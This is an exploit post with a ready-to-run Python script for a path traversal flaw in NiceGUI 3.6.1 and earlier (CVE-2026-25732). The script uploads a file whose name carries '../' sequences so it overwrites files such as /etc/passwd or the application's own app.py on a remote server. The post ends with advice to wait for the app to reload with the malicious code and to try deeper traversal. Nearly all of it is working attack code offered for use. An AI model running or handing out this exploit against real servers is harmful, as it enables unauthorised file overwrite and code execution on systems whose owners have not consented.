NiceGUI 3.6.1 Path Traversal

# Exploit Title: NiceGUI 3.6.1 - Path Traversal # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-06 # Tested on: NiceGUI <= 3.6.1 (Python 3.8–3.12 on Linux/Windows) # CVE: CVE-2026-25732 # # Affected Versions: <= 3.6.1 (fixed in 3.7.0) # # Type: Remote Arbitrary File Write / Path Traversal # Platform: Web Application (Python / NiceGUI) # Author Country: Jordan # Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) # Attack Vector: Network # Privileges Required: None #!/usr/bin/env python3 """ CVE-2026-25732 — NiceGUI arbitrary file write (path traversal) Exploits unsanitized FileUpload.name when app uses it in save path. Usage: python exploit_cve_2026_25732.py http://target:8080 "../etc/passwd" payload.txt python exploit_cve_2026_25732.py http://target:8080 "../app.py" malicious_app.py """ import sys import requests from urllib.parse import urljoin from pathlib import Path def exploit(target_url: str, malicious_filename: str, local_payload_path: str | Path): target_url = target_url.rstrip('/') + '/' try: with open(local_payload_path, 'rb') as f: payload_bytes = f.read() except Exception as e: print(f"[-] Cannot read payload file: {e}") sys.exit(1) files = { 'file': (malicious_filename, payload_bytes, 'application/octet-stream') } print(f"[*] Target : {target_url}") print(f"[*] Malicious name : {malicious_filename}") print(f"[*] Payload size : {len(payload_bytes):,} bytes") try: # NiceGUI upload endpoint is usually the page itself (multipart POST to /) r = requests.post( target_url, files=files, timeout=12, allow_redirects=False ) print(f"[+] Response : {r.status_code} {r.reason}") if r.status_code in (200, 201, 204): print("[SUCCESS] Upload accepted — file likely written") elif r.status_code == 413: print("[!] Payload too large (server limit)") elif r.status_code in (400, 403, 422): print("[!] Rejected — target may be patched / not vulnerable / wrong endpoint") else: print("[?] Unexpected response — check manually") print("\nSnippet of response:") print(r.text[:600].replace('\n', ' ').strip() + "..." if len(r.text) > 600 else r.text) except requests.RequestException as e: print(f"[-] Request failed: {e}") print("\nNext steps:") print(" • Check filesystem on target (if you have access)") print(" • If you overwrote app.py / main.py → wait for reload / restart") print(" • Try deeper traversal: '../../some/secret/file' etc.") if __name__ == '__main__': if len(sys.argv) != 4: print(__doc__) sys.exit(1) target = sys.argv[1] dest_filename = sys.argv[2] payload_file = sys.argv[3] exploit(target, dest_filename, payload_file)